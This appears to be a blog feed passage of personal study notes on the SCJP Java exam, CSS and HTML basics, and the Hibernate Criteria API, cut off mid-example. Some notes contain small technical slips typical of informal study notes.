<li>abstract and final cannot be used on the class at the same time.
This will give a compilation error</li>
<li>When a subclass is created, then the methods from the superclass can
be accessed by the subclass object or by using this operator (in the
subclass methods)</li>
<li>Watch out for public static void main accessing the member variables
and methods without an Object reference. (Static method cannot access
non-static variables)</li>
<li>Private methods CANNOT be overriden. Even if they have the same name
and signature, technically it is NOT overriding</li>
<li><code>default</code> method can be accessed only if the class
accessing belongs to the same package PACKAGE Restriction</li>
<li>Protected method can be accessed through inhertiance though the
subclass is from a different package - <strong>Package +
kids</strong></li>
<li>When a subclass outside the package inherits the protected member
(inheritance), the member becomes private to any codce outside the
class</li>
<li>Refer to Access to class Members lesson.</li>
<li>The first CONCRETE subclass of an abstract class must implement all
abstract methods of the superclasses
<code>public void setSpeed(int speed) { speed=speed;}</code>. This will
just take the local variable speed. We need to declare it as this.speed
(NO compilation error)</li>
<li>Any variables declared as final has to be initialized either in the
declaration itself or in the constructor else Compilation error occurs
(If it is not marked final, instance variables need not be initialized).
Also it cannot be overriden by sub class constructors.</li>
<li>STATIC methods cannot be overriden</li>
<li>abstract methods cannot be declared PRIVATE (compliation error),
SYNCHRONIZED, strictfp, native and STATIC synchronized, native and
strictfp modifiers can be set only to Methods not variables and
classes</li>
<li>Only instance variables can be marked transient and volatile (not
methods or classes)</li>
<li>Instance variables can be marked four access levels, final,
transient and volatile</li>
<li>Instance variables cannot be marked abstract, synchronized, native
and strictfp</li>
<li>Refer to Comparison of modifiers for variables and methods</li>
<li>Local variables don’t get default values and should be initialized
before use</li>
<li>Instance variables marked <code>final</code> should be initialized
in declaration itself or in the CONSTRUCTOR itself - (Compilation
error)</li>
<li>INTERFACE variables are always public static final. So cannot be
reassigned</li>
<li>Refer to things that can be static and non-static</li>
<li>Explicit imports are resolved first, then the classes from the
current package and last- the implicit imports</li>
<li>for <code>java.lang.Runnable</code> interface question, only one
method available is public void run(){}</li>
<li>Refer to Interface Properties</li>
<li>A variable declared in the interface cannot be changed at all</li>
<li>A concrete implementation of an interface need not declare the
throws clause of the abstract method, however cannot add any new ones
only the subclasses or the class declared in the abstract method
itself</li>
<li>Only INTERFACEs can extend more than one interface, but it CANNOT
implement any class</li>
<li>Synchronized can be applied to static and final methods</li>
<li>When a class with protected method is created, the method can be
accessed ONLY by the subclass ‘this’ or subclass objects WITHIN the
class (Super class objects give compilation error).</li>
<li>Outside the subclass, the method cannot be accessed using
objects</li>
</ol>
<h3 id="chapter-3">Chapter 3</h3>
<ol type="1">
<li>Compound operators (+=) have an implicit cast</li>
<li>For divide by zero, integers will give ArithmethicException at
runtime, while floating point numbers returns positive or negative
infinity(same for using the reminder operator also)</li>
<li>The Sysouts works from left to right. If the left and right operand
is integer then the result is integer else if one of them is a string
then the result is a string</li>
<li>Watch out for increment/decrement operators on a FINAL variable</li>
<li>For <code>>></code> (right shift), the sign bit gets copied
over. Hence the sign remains the same(-ve number remains negative). For
<code><<</code> (left shift) the right side is ALWAYS FILLED with
zeroes</li>
<li><code>>>></code> (UNSIGNED Right Shift) always fills the
left side with zeroes irrespective of the sign bit.Hence this shift
always gives a positive number</li>
<li>When the shift number is greater than the bit length, then the
reminder is used for shifting. Ex:
<code>int x = 2; x >>= 34</code>. This actually means
<code>x >>= 2</code> where <code>34%32 = 2</code></li>
<li><<Right Shift divides the number by
<code>2^bits(Ex: x >> 3 means x/2^3)</code></li>
<li><<Left Shift multiplies the number by
<code>2^bits(Ex: x << 3 means x * 2^3)</code>>></li>
<li><<<code>& - Logical AND; | - Logical OR; ^ - Exclusive OR; ~ - Bitwise compliment</code>>></li>
<li>Refer to Values of the Truth table</li>
<li>SHORT CIRCUIT Operators work only with Boolean Expressions and NOT
with numbers.</li>
<li>However, the logical AND and OR can work with both shadowing
Primitives and Object references</li>
<li>Watch out for EXOR being mistaken for power of (Always use
Math.power of)</li>
<li>Always <code>&</code> takes precedence over <code>|</code> . So
<code>&</code> is evaluated first, in a boolean expression</li>
<li>Whenever any action happens on a String Object, a new String object
is created as the result</li>
</ol>
<h3 id="chapter-4">Chapter 4</h3>
<ol type="1">
<li>The else will always belong to the innermost if which doesn’t have
an else</li>
<li>The arguments to switch statement can only be byte,short,char and
int</li>
<li>The switch can check only for equality and the case arguments must
be determined at runtime. So they have to be either literal constants or
final variables</li>
<li>If switch(byte variable) is used, then if the case value is greater
than 127 then COMPILATION error occurs</li>
<li>In switch case, two case literals cannot have the same value</li>
<li><code>default</code> can be placed anywhere in switch case and it
will also follow the rule of fall-through</li>
<li>The scope of the variables declared in the for loop is within the
for-loop.</li>
<li>In a For Loop, Initialization is performed and CONDITION is checked
before the first execution</li>
<li>Iteration will run after every execution and then only comes out of
the loop. However, if break, System,exit or return is given inside the
for-loop the iteration is NOT executed</li>
<li><code>continue</code> should be within a loop while break should be
within a loop or switch statement</li>
<li>A try clause Should always have either catch or finally block which
should immediately follow the try clause without any statements in
between</li>
<li>If the subclass is placed after the superclass in the exception
catch, COMPILATION Error occcurs</li>
<li>Any method “ducking” the exception should also declare the throws
clause, except for RunTimeExceptions</li>
<li>Error or subclass of Error are always unchecked. So it is not
required to catch them</li>
<li>For re-throwing the exceptions also(commonly from a catch block), we
need to declare the exceptions</li>
<li>Assertion is always tested for true condition, if the condition
returns false, AssertionError is thrown</li>
<li><code>Ex: asssert (x< y) : "Error statement "+y</code>. The First
Expression should always result in a boolean while the second expression
should always result in a value ( just like sysout)(Cannot be a call to
a void method)</li>
<li>Refer to Legal and Ilegal assert Expressions</li>
<li>assertions are disabled by default. So we can use assert as an
identifier. But if we turn on assertions, then assert is a keyword -
<code>Turn On: javac -source 1.4 test.ClassName</code></li>
<li>To Compile without assertions (default)
<code>javac -source 1.3 test.ClassName</code></li>
<li>Enabling assertions while executing :
<code>java (-ea or -enableassertions) test.ClassName</code></li>
<li>Disabling assertions while executing :
<code>java (-da or -disableassertions) test.ClassName</code></li>
<li>The above enabling or disabling can be given without any class or
package name for all classes or only at package or class level
<code>java -ea da:test.ClassName</code> enables for all except
test.ClassName (same for package as well)</li>
<li>Refer to Assertion Command Line switches</li>
<li>AssertionError can be caught but it is not
appropriate(non-recommended) AssertionError object is not
accessible</li>
<li>Assertion recommendations:</li>
</ol>
<ul>
<li>Do not use assertions to validate arguments to a public method
(needs to be checked mandatorily)</li>
<li>Do use assertions to validate arguments to a private method</li>
<li>Do not use assertions to validate command-line arguments</li>
<li>Do use assertions, even in public methods, to check for cases that
you know are never, ever supposed to happen (default of a switch Ex:
default: <code>assert false;</code></li>
<li>Do not use assert expressions that can cause side effects (method
calls or value changing ones)</li>
<li>Do not use assertions in private getters and setters”</li>
</ul>
<ol start="27" type="1">
<li>If a variable is marked FINAL, always check for any code that
changes the value</li>
<li>The VM evaluates all assertion flags from left to right</li>
</ol>
<h3 id="chapter-5">Chapter 5</h3>
<ol type="1">
<li>getters - Accessors and setters - mutators</li>
<li>When the instance variables are public, watch for questions about
whether the values will always be as those set in the settters</li>
<li>IS-A means extends (subclass). IS-A, extends, derived from,
Inherited from, instance of, subtype of all means subclassing</li>
<li>HAS-A means having a reference variable of type</li>
<li><code>Animal a = new Horse();</code> a can access methods which are
ONLY overridden by the Horse Object and CANNOT access methods which are
present only in the Horse Class. However, it can access all methods of
Animal, though they are not present in the Horse</li>
<li><code>Animal a = new Horse(); a.eat()</code> will call the HORSE
object eat as the object type is decided by virtual method invocation
for OVERRIDING methods</li>
<li>Rules for Overriding:</li>
</ol>
<ul>
<li>Argument list and type, return type should match</li>
<li>Access levels can be less retrictive but CANNOT be more
restrictive</li>
<li>There cannot be additional broader exceptions thrown, however it can
be lesser or narrower (subclass can be thrown)”</li>
</ul>
<ol start="8" type="1">
<li>Overload can change the return type, however changing ONLY the
return type is not a valid overload</li>
<li>Overload can change the argument list, return type, access modifier,
can give broader and new exceptions, overloaded in the same or
subclass</li>
<li>The REFERENCE Type decides which overloaded method is being
called.</li>
</ol>
<ul>
<li>Overriding - Instance Type (Runtime)</li>
<li>Overloading - reference Type (Compile Time)</li>
</ul>
<ol start="11" type="1">
<li>Refer to Overloaded and Overriden Method Invocations</li>
<li>Refer to Difference between Overloaded and Overriden methods</li>
<li>Watch out for methods with same as the class but with a return type.
They are not constructors</li>
<li>If a constructor with arguments is created, a no-arg constructor
will NOT be created by default</li>
<li>Abstract classes can have Constructors and are always called when
the subclass is instantiated. Interfaces DO NOT have constructors</li>
<li>A constructor can be called only by another constructor using
super() or this(), it cannot be called by any other method</li>
<li>A default constructor has the same access modifier as the class, a
super() call in the first line and is of no-arg type</li>
<li>If the super class does not have a no-arg constructor, we HAVE to
provide the super() call correctly (Compilation Error)</li>
<li>A constructor cannot be overriden but can be overloaded, but only
within the same class as it is NOT inherited</li>
<li>A constructor can have only a call to super() or this() and it
should be there in the first line</li>
<li>For return values, it can be a value which can be IMPLICITLY cast
into the return type (short for an int return type) and a sub class type
can be returned for a super class return type</li>
</ol>
<h3 id="chapter-6">Chapter 6</h3>
<ol type="1">
<li>Refer to String Object Creation count</li>
<li><code>String.charAt(index)</code> is zero based</li>
<li>Arrays has an ATTRIBUTE length while String has a method
length()</li>
<li><code>String.substring</code> (the String word in the method is in
lowercase) has (start,end). Start is zero-indexed and End is
1-indexed</li>
<li>StringBuffer are ideal for file I/O for handling large streams of
data</li>
<li>StringBuffer methods are Synchronized</li>
<li><code>StringBuffer.insert(offset,String)</code>. Offset is
Zero-indexed</li>
<li><code>abs</code> method has all four numerical types as
arguments</li>
<li><code>ceil</code> and <code>floor</code> takes only a double and
returns a double</li>
<li><code>max</code> and <code>min</code> takes all four types of
arguments but arg1 and arg2 should be of the same type. However for
arguments, they are implicitly CAST. Eg: <code>Math.max(23.5, 3)</code>
or <code>Math.max(a,b)</code> where a is int and b is float</li>
<li><code>random</code> generates a number between 0.0 <= x <
1.0</li>
<li><code>round</code> takes a float or double and returns a int or
long</li>
<li>sin,cos, tan and SQRT takes only double (radians) and returns a
double</li>
<li><code>toDegree</code> and <code>toRadian</code> takes and returns a
double</li>
<li>Refer to Important static Math methods</li>
<li>Wrapper classes Float and Double has POSITIVE_INFINITY and
NEGATIVE_INFINITY</li>
<li><code>Double.isNAN(x)</code> is used for testing numbers</li>
<li><code>Math.sqrt(-16d)</code> results in NaN</li>
<li>divide by 0 for floating point number works while for integers gives
ArithmeticException</li>
<li>Refer to Wrapper Class Constructor Arguments</li>
<li><code>valueOf</code> is present for Integer, Long,Byte and Short and
is used as <code>Integer.valueOf("1001101", 2) => 43</code>. i.e.,
takes two arguments String and radix and returns a WRAPPER class</li>
<li><code>intValue</code> and <code>parseInt</code> returns a primitive
number</li>
<li>Refer to Wrapper Conversion Methods (Important)</li>
<li>The 3 types of toString usages are:</li>
</ol>
<ul>
<li><code>obj.toString()</code>;</li>
<li><code>Double.toString(3.3d)</code> (All wrapper class has this
except Boolean and Character)</li>
<li><code>Long.toString(254,16)</code> => fe (Integer and Long)</li>
</ul>
<ol start="25" type="1">
<li>Integer and Long has these methods also.</li>
</ol>
<ul>
<li>Integer.toBinaryString(), toHexString() and toOctalString()</li>
</ul>
<ol start="26" type="1">
<li>Watch out for usage of StringBuffer methods like append(), reverse(0
on string Objects which leads to Compilation Error</li>
</ol>
<p>Continued in <a href="aceing-scjp-notes-from-kathy-sierra-prep-book-part-2">Part
2</a></p>Learning basics of CSS and quick notes2008-09-03T00:00:00-07:002008-09-03T00:00:00-07:00Senthilkumar Gopaltag:sengopal.github.io,2008-09-03:/posts/learning-basics-of-css-and-quick-notes.htmlThe following are some of the important points that i had gathered during my learning of CSS and HTML markup. It also contains the important factors to consider when converting a given PSD or image into a good HTML markup and CSS.<p>The following are some of the important points that i had gathered
during my learning of CSS and HTML markup. It also contains the
important factors to consider when converting a given PSD or image into
a good HTML markup and CSS.</p>
<h3 id="slicing-techniques">Slicing techniques</h3>
<ol type="1">
<li>Do not slice the logo</li>
<li>Figure out the gradient for repeating along the x -axis</li>
<li>Dont start with the slice tool from the toolbar</li>
<li>Always design with a wrapper div - for a row or a column - to be
enclosed as a container tag</li>
<li>Decide upon only one type of slicing for a given layout - for the
wrapper divs and then perform the slicing</li>
<li>First horizontal - because the flow goes from right to left</li>
<li>After selecting the slice, divide the slice and give the number of
dividers you would need</li>
<li>Save for Web and Devices - Gif and PNG for transparent ones</li>
<li>Quality generally set up as 75-85%</li>
</ol>
<h3 id="remember">Remember</h3>
<ol type="1">
<li>height, width, padding, margin, float - main important
properties</li>
<li>use the following (or use a reset)</li>
</ol>
<div class="sourceCode" id="cb1"><pre class="sourceCode css"><code class="sourceCode css"><span id="cb1-1"><a aria-hidden="true" href="#cb1-1" tabindex="-1"></a>body{</span>
<span id="cb1-2"><a aria-hidden="true" href="#cb1-2" tabindex="-1"></a> <span class="kw">padding</span><span class="ch">:</span><span class="dv">0</span><span class="op">;</span></span>
<span id="cb1-3"><a aria-hidden="true" href="#cb1-3" tabindex="-1"></a> <span class="kw">margin</span><span class="ch">:</span><span class="dv">0</span><span class="op">;</span></span>
<span id="cb1-4"><a aria-hidden="true" href="#cb1-4" tabindex="-1"></a>}</span></code></pre></div>
<ol start="3" type="1">
<li>Give Wrapper <code>margin:auto;</code> to make the whole container
centered</li>
<li>Give fixed width and height to get the margin auto to work
properly</li>
<li>Div dimensions: width + margin + padding + border</li>
<li>Whenever u are adding a padding or margin, adjust the width or
height appropriately</li>
<li>Use <code>margin:auto;</code> to center the div within the
container</li>
<li><code>\#nav ul{ margin:0; padding:0;}</code> - remember for every UL
block or use a reset</li>
<li>Always use <code>ul{list-style-type: none;}</code></li>
<li>Give <code>li{display:block}</code> and provide width & height
to get a BUTTON look and feel</li>
<li>For vertical nav bar, when absolute position is used, use negative
margin-left and margin-top of size half of the width and height of the
div.</li>
<li>Always the target browsers and supported resolutions needs to be
decided</li>
</ol>
<h3 id="media-queries">Media Queries</h3>
<ol type="1">
<li>Change float to normal using the height/width/float properties for
changing screen size</li>
<li>Always use <code>margin,padding:0</code> - for reset</li>
<li>Types of layouts - pure fluid / pure display oriented / hybrid ..
Fluid Layout … system of relative layout instead of absolute pixels …
height/width - only in percentages</li>
</ol>
<p>.. Adaptive Layout … using the <span class="citation" data-cites="media">(<strong>media?</strong>)</span> tags</p>
<p>.. Responsive Layout … Mix of Fluid and adaptive layouts. PERCENTAGE
+ Media Tags</p>
<ol start="4" type="1">
<li>New way of setting the media value [source,html]</li>
</ol>
<pre><code> <meta name="viewport" content="initial-scale=1,width=device-width"></code></pre>
<ol start="5" type="1">
<li>Media query representation</li>
</ol>
<div class="sourceCode" id="cb3"><pre class="sourceCode css"><code class="sourceCode css"><span id="cb3-1"><a aria-hidden="true" href="#cb3-1" tabindex="-1"></a> <span class="im">@media</span> <span class="an">screen</span> <span class="kw">and</span> <span class="fu">(</span><span class="kw">max-width</span><span class="ch">:</span> <span class="dv">980</span><span class="dt">px</span><span class="fu">)</span>{</span>
<span id="cb3-2"><a aria-hidden="true" href="#cb3-2" tabindex="-1"></a> ....</span>
<span id="cb3-3"><a aria-hidden="true" href="#cb3-3" tabindex="-1"></a> }</span></code></pre></div>
<ol start="6" type="1">
<li>Always create the smallest resolution first</li>
<li>Try to use different images with different srcs to cater to
different sizes</li>
</ol>
<h3 id="types-of-selectors">Types of Selectors</h3>
<ol type="1">
<li>Tag</li>
<li>Class</li>
<li>Pseudo-element <code>[first-line, first-character]</code> <em>This
is the LEAST important selector</em></li>
<li>Contextual/Conditional - selective styling -
<code>p strong{}</code></li>
<li>Group/Compound selector - more than 1 tag</li>
<li>Pseudo-class <code>[link,active,hover,visited]</code> - <em>MORE
important than the other pseudo-element</em></li>
<li>ID Selector</li>
<li>when to use id vs class? .. Use Class references with Less weightage
.. Use the TAG selectors first</li>
</ol>
<h3 id="selectors-precedence">Selectors Precedence</h3>
<ol type="1">
<li>The precedence for any style flows as :
<code>inline > Embedded > External</code></li>
<li>The precedence for any selector: id > class > tag</li>
<li>For more details, refer to</li>
</ol>
<ul>
<li>http://www.w3.org/TR/CSS21/cascade.html#specificity[Specificity]</li>
<li>http://www.w3.org/TR/CSS2/selector.html[Selector]</li>
<li>http://css-tricks.com/specifics-on-css-specificity/[CSS Tricks]</li>
</ul>
<h3 id="hierarchy-of-precedence">Hierarchy of precedence</h3>
<ol type="1">
<li>The ID selector</li>
<li>The attribute selector</li>
<li>The class selector</li>
<li>The child selector</li>
<li>The adjacent sibling selector - <code>.blog-img + p</code></li>
<li>The descendant selector</li>
<li>The tag selector</li>
</ol>
<h3 id="shorthand-syntax">Shorthand syntax</h3>
<p>###= background</p>
<div class="sourceCode" id="cb4"><pre class="sourceCode css"><code class="sourceCode css"><span id="cb4-1"><a aria-hidden="true" href="#cb4-1" tabindex="-1"></a> background<span class="in">:</span> url<span class="in">(</span>example<span class="fu">.gif</span><span class="in">)</span>;</span>
<span id="cb4-2"><a aria-hidden="true" href="#cb4-2" tabindex="-1"></a> background-color<span class="in">:</span> <span class="pp">#eaeaea</span> ;</span>
<span id="cb4-3"><a aria-hidden="true" href="#cb4-3" tabindex="-1"></a> background-repeat<span class="in">:</span> repeat-x;</span>
<span id="cb4-4"><a aria-hidden="true" href="#cb4-4" tabindex="-1"></a> background-position<span class="in">:</span> top left;</span></code></pre></div>
<p>can be written as:</p>
<div class="sourceCode" id="cb5"><pre class="sourceCode css"><code class="sourceCode css"><span id="cb5-1"><a aria-hidden="true" href="#cb5-1" tabindex="-1"></a>background<span class="in">:</span> <span class="pp">#eaeaea</span> url<span class="in">(</span>example<span class="fu">.gif</span><span class="in">)</span> repeat-x top left;</span></code></pre></div>
<p>###= border</p>
<div class="sourceCode" id="cb6"><pre class="sourceCode css"><code class="sourceCode css"><span id="cb6-1"><a aria-hidden="true" href="#cb6-1" tabindex="-1"></a> border-color<span class="in">:</span> red;</span>
<span id="cb6-2"><a aria-hidden="true" href="#cb6-2" tabindex="-1"></a> border-width<span class="in">:</span> 1px;</span>
<span id="cb6-3"><a aria-hidden="true" href="#cb6-3" tabindex="-1"></a> border-style<span class="in">:</span> solid;</span></code></pre></div>
<p>can be written as:</p>
<div class="sourceCode" id="cb7"><pre class="sourceCode css"><code class="sourceCode css"><span id="cb7-1"><a aria-hidden="true" href="#cb7-1" tabindex="-1"></a>border<span class="in">:</span> 1px solid red;</span></code></pre></div>
<p>###= list</p>
<div class="sourceCode" id="cb8"><pre class="sourceCode css"><code class="sourceCode css"><span id="cb8-1"><a aria-hidden="true" href="#cb8-1" tabindex="-1"></a> list-style-position<span class="in">:</span> outside;</span>
<span id="cb8-2"><a aria-hidden="true" href="#cb8-2" tabindex="-1"></a> list-style-image<span class="in">:</span> none;</span>
<span id="cb8-3"><a aria-hidden="true" href="#cb8-3" tabindex="-1"></a> list-style-type<span class="in">:</span> disc;</span></code></pre></div>
<p>can be written as:</p>
<div class="sourceCode" id="cb9"><pre class="sourceCode css"><code class="sourceCode css"><span id="cb9-1"><a aria-hidden="true" href="#cb9-1" tabindex="-1"></a>list-style<span class="in">:</span> disc outside;`</span></code></pre></div>
<p>the general format for a list style is:</p>
<div class="sourceCode" id="cb10"><pre class="sourceCode css"><code class="sourceCode css"><span id="cb10-1"><a aria-hidden="true" href="#cb10-1" tabindex="-1"></a>list-style<span class="in">:</span> <span class="ex">[</span><span class="ss">list-style-type</span><span class="ex">]</span> <span class="ex">[</span><span class="ss">list-style-position</span><span class="ex">]</span> <span class="ex">[</span><span class="ss">list-style-image</span><span class="ex">]</span>;</span></code></pre></div>
<h6 id="font">font</h6>
<div class="sourceCode" id="cb11"><pre class="sourceCode css"><code class="sourceCode css"><span id="cb11-1"><a aria-hidden="true" href="#cb11-1" tabindex="-1"></a> font-family<span class="in">:</span> Arial<span class="op">,</span> Helvetica;</span>
<span id="cb11-2"><a aria-hidden="true" href="#cb11-2" tabindex="-1"></a> font-weight<span class="in">:</span> bold;</span>
<span id="cb11-3"><a aria-hidden="true" href="#cb11-3" tabindex="-1"></a> font-style<span class="in">:</span> italic;</span>
<span id="cb11-4"><a aria-hidden="true" href="#cb11-4" tabindex="-1"></a> font-size<span class="in">:</span> 1em;</span>
<span id="cb11-5"><a aria-hidden="true" href="#cb11-5" tabindex="-1"></a> line-height<span class="in">:</span> 1<span class="fu">.5em</span>;</span></code></pre></div>
<p>can be written as:</p>
<div class="sourceCode" id="cb12"><pre class="sourceCode css"><code class="sourceCode css"><span id="cb12-1"><a aria-hidden="true" href="#cb12-1" tabindex="-1"></a>font<span class="in">:</span> bold italic 1em/1<span class="fu">.5em</span> Arial<span class="op">,</span> Helvetica;</span></code></pre></div>
<p>###= margin The margin properties allows a shorthand for margin-top,
margin-right, margin-bottom and margin-left.</p>
<div class="sourceCode" id="cb13"><pre class="sourceCode css"><code class="sourceCode css"><span id="cb13-1"><a aria-hidden="true" href="#cb13-1" tabindex="-1"></a> <span class="co">/* top=10px, right=5px, bottom=15px, left=20px */</span></span>
<span id="cb13-2"><a aria-hidden="true" href="#cb13-2" tabindex="-1"></a> margin<span class="in">:</span> 10px 5px 15px 20px;</span>
<span id="cb13-3"><a aria-hidden="true" href="#cb13-3" tabindex="-1"></a></span>
<span id="cb13-4"><a aria-hidden="true" href="#cb13-4" tabindex="-1"></a> <span class="co">/* top=10px, right=5px, bottom=10px, left=5px*/</span></span>
<span id="cb13-5"><a aria-hidden="true" href="#cb13-5" tabindex="-1"></a> margin<span class="in">:</span> 10px 5px;</span>
<span id="cb13-6"><a aria-hidden="true" href="#cb13-6" tabindex="-1"></a></span>
<span id="cb13-7"><a aria-hidden="true" href="#cb13-7" tabindex="-1"></a> <span class="co">/* top=10px, right=5px, bottom=15px, left=5px*/</span></span>
<span id="cb13-8"><a aria-hidden="true" href="#cb13-8" tabindex="-1"></a> margin<span class="in">:</span> 10px 5px 15px;</span></code></pre></div>
<h3 id="form-features-in-html5">Form features in HTML5</h3>
<ol type="1">
<li>Placeholder text</li>
<li>Slider control</li>
<li>Calendar/Date picker</li>
<li>autocomplete</li>
<li>Input type Search</li>
</ol>
<h3 id="css-features-in-html5">CSS features in HTML5</h3>
<ol type="1">
<li>Shadow - box shadow, text shadow</li>
<li>Gradient</li>
<li>Blur</li>
<li>column text</li>
<li>transform / transitions</li>
<li>Rounded corners (using border radius)</li>
<li>CSS Regions</li>
<li>Exclusions</li>
<li>Shaders</li>
<li>Shadow DOM</li>
<li>Multiple Images in background</li>
<li>Alpha</li>
<li>Font-faces</li>
<li>Animation using Keyframes</li>
<li><em>Position:fixed or other positioning important for animations to
work</em></li>
</ol>
<h3 id="new-tags-in-html5">New Tags in HTML5</h3>
<ol type="1">
<li>New semantic tags - header, footer, nav, section, aside,
article</li>
<li>Multimedia tags - audio/sound,video</li>
<li>Drawing based tags - canvas, svg</li>
<li>Form based new tags - Date, slider, time, spinner</li>
</ol>
<h3 id="important-links">Important Links</h3>
<ol type="1">
<li><a href="http://css3generator.com/">Css3Generator</a></li>
<li><a href="http://meyerweb.com/eric/tools/css/reset/">Reset</a></li>
<li><a href="http://vandelaydesign.com/blog/design/resources-grid-based-design/">Grid</a></li>
<li><a href="http://paulirish.com/2008/conditional-stylesheets-vs-css-hacks-answer-neither/">IE
support</a></li>
<li><a href="https://github.com/aFarkas/html5shiv">html5shiv</a></li>
<li><a href="http://modernizr.com/">modernizer</a></li>
<li><a href="http://html5boilerplate.com/">html5boilerplate</a></li>
<li><a href="http://html.adobe.com/edge/inspect/">Adobe Inspect</a></li>
<li><a href="http://brackets.io/">Brackets</a></li>
</ol>Criteria API in Hibernate2008-05-30T00:00:00-07:002008-05-30T00:00:00-07:00Senthilkumar Gopaltag:sengopal.github.io,2008-05-30:/posts/criteria-api-in-hibernate.htmlA post about the Criteria API available as part of the Hibernate API. This post also explores how to use the API perform SQL operations in a more object oriented manner.<h3 id="drawbacks-of-hql">Drawbacks of HQL</h3>
<p>Currently HQL (Hibernate Query Language) is used widely to query data
using Hibernate. However, there are many drawbacks such as:</p>
<ol type="1">
<li>SQL-like syntax and Non Extensible</li>
<li>Relational methodology instead of OO methodology</li>
<li>Problem in creating search queries on the fly</li>
<li>Complexity increases with number of variable conditions</li>
<li>Error-prone String concatenation</li>
<li>Direct use of query parameters in the query string</li>
</ol>
<p>A sample usage for HQL Query:</p>
<div class="sourceCode" id="cb1"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb1-1"><a aria-hidden="true" href="#cb1-1" tabindex="-1"></a><span class="bu">String</span> query <span class="op">=</span> <span class="st">"select o from Order as o join o.products as p where o.priceTotal > :priceTotalLower and o.priceTotal < :priceTotalUpper"</span><span class="op">;</span> </span>
<span id="cb1-2"><a aria-hidden="true" href="#cb1-2" tabindex="-1"></a><span class="bu">Query</span> q <span class="op">=</span> sess<span class="op">.</span><span class="fu">createQuery</span><span class="op">(</span>query<span class="op">);</span></span>
<span id="cb1-3"><a aria-hidden="true" href="#cb1-3" tabindex="-1"></a>q<span class="op">.</span><span class="fu">setDouble</span><span class="op">(</span><span class="st">"priceTotalLower"</span><span class="op">,</span> <span class="bu">Double</span><span class="op">.</span><span class="fu">parseDouble</span><span class="op">(</span>lower<span class="op">));</span></span>
<span id="cb1-4"><a aria-hidden="true" href="#cb1-4" tabindex="-1"></a>q<span class="op">.</span><span class="fu">setDouble</span><span class="op">(</span><span class="st">"priceTotalUpper"</span><span class="op">,</span><span class="bu">Double</span><span class="op">.</span><span class="fu">parseDouble</span><span class="op">(</span>upper<span class="op">));</span></span>
<span id="cb1-5"><a aria-hidden="true" href="#cb1-5" tabindex="-1"></a><span class="bu">List</span> list <span class="op">=</span> q<span class="op">.</span><span class="fu">list</span><span class="op">();</span></span></code></pre></div>
<p>In comparison to the Criteria API, the above query gets reduced to
simple two lines with more comprehension and understanding of the
functionality.</p>
<div class="sourceCode" id="cb2"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb2-1"><a aria-hidden="true" href="#cb2-1" tabindex="-1"></a><span class="bu">List</span> list <span class="op">=</span> sess<span class="op">.</span><span class="fu">createCriteria</span><span class="op">(</span>Order<span class="op">.</span><span class="fu">class</span><span class="op">)</span></span>
<span id="cb2-2"><a aria-hidden="true" href="#cb2-2" tabindex="-1"></a><span class="op">.</span><span class="fu">add</span><span class="op">(</span>Restrictions<span class="op">.</span><span class="fu">between</span><span class="op">(</span>lower<span class="op">,</span>upper<span class="op">).</span><span class="fu">list</span><span class="op">();</span></span></code></pre></div>
<p>In addition to the conciseness and readability, following are some of
the best parts of using the Criteria API</p>
<ol type="1">
<li>Aspects of the relational approach</li>
<li>Reduces the complexity</li>
<li>Multi-criteria search functionalities</li>
<li>Building Hibernate Queries on the fly</li>
<li>Knowledge of SQL not necessary</li>
<li><strong>Extensible</strong> since it uses OO methodology</li>
<li><strong>Interoperable</strong> since it has provision for including
native SQL clauses also</li>
<li>Rich set of comparison operators</li>
<li>Business Objects as query parameters, without having to use primary
and foreign key references</li>
<li>Optimizing queries by providing various JOIN Strategies</li>
<li>Provides cleaner, clearer, more reliable and more maintainable
code.</li>
</ol>
<h3 id="what-is-criteria-api">What is Criteria API?</h3>
<p>There are five core components of the Criteria API.</p>
<ol type="1">
<li>Criteria</li>
<li>Criterion</li>
<li>Restrictions</li>
<li>Projection</li>
<li>Order</li>
</ol>
<p>Criteria class provides the gateway to working with criteria APIs.
Criterion class is the object-oriented representation of the relational
criterion. Restriction API provides the built-in types for Criterion.
Essentially, the Restriction class is a factory to the Criterion class.
All of its methods are static.</p>
<p>In Hibernate 2.x, the Expression class provided the services that are
now provided by the Restriction class. The Restriction class provides
almost all the required restrictions such as equals (eq()), logical and
(and()), like (like()) Aggregation and Grouping are provided by the
Projection class. Order class represents the “order by” clause of
SQL.</p>
<h3 id="order-interface">Order Interface</h3>
<p>In HQL (and SQL), the order by clause allows you to order your query
results. This is done using the addOrder() method and the Order class
The SQL will have the order clause in the sequence the Order objects
were added to the Critieria.</p>
<div class="sourceCode" id="cb3"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb3-1"><a aria-hidden="true" href="#cb3-1" tabindex="-1"></a>Criteria crit <span class="op">=</span> session<span class="op">.</span><span class="fu">createCriteria</span><span class="op">(</span>Sale<span class="op">.</span><span class="fu">class</span><span class="op">)</span> <span class="op">;</span></span>
<span id="cb3-2"><a aria-hidden="true" href="#cb3-2" tabindex="-1"></a>crit<span class="op">.</span><span class="fu">addOrder</span><span class="op">(</span> Order<span class="op">.</span><span class="fu">desc</span><span class="op">(</span><span class="st">"date"</span><span class="op">)</span> <span class="op">);</span></span>
<span id="cb3-3"><a aria-hidden="true" href="#cb3-3" tabindex="-1"></a>crit<span class="op">.</span><span class="fu">addOrder</span><span class="op">(</span> Order<span class="op">.</span><span class="fu">asc</span><span class="op">(</span><span class="st">"product.number"</span><span class="op">)</span> <span class="op">);</span></span></code></pre></div>
<h3 id="simple-criteria-query">Simple Criteria Query</h3>
<p>The following code shows how a simple Criteria query is built.</p>
<ol type="1">
<li>It selects the Insurance Object</li>
<li>Includes a Where clause insurance name like ‘%a%’</li>
<li>Includes another Where clause investmentAmount value between 1000
and 2500 inclusive</li>
<li>Sets the number of maximum results as 5</li>
</ol>
<div class="sourceCode" id="cb4"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb4-1"><a aria-hidden="true" href="#cb4-1" tabindex="-1"></a>session <span class="op">=</span> sessionFactory<span class="op">.</span><span class="fu">openSession</span><span class="op">();</span></span>
<span id="cb4-2"><a aria-hidden="true" href="#cb4-2" tabindex="-1"></a>Criteria crit <span class="op">=</span> session<span class="op">.</span><span class="fu">createCriteria</span><span class="op">(</span>Insurance<span class="op">.</span><span class="fu">class</span><span class="op">);</span></span>
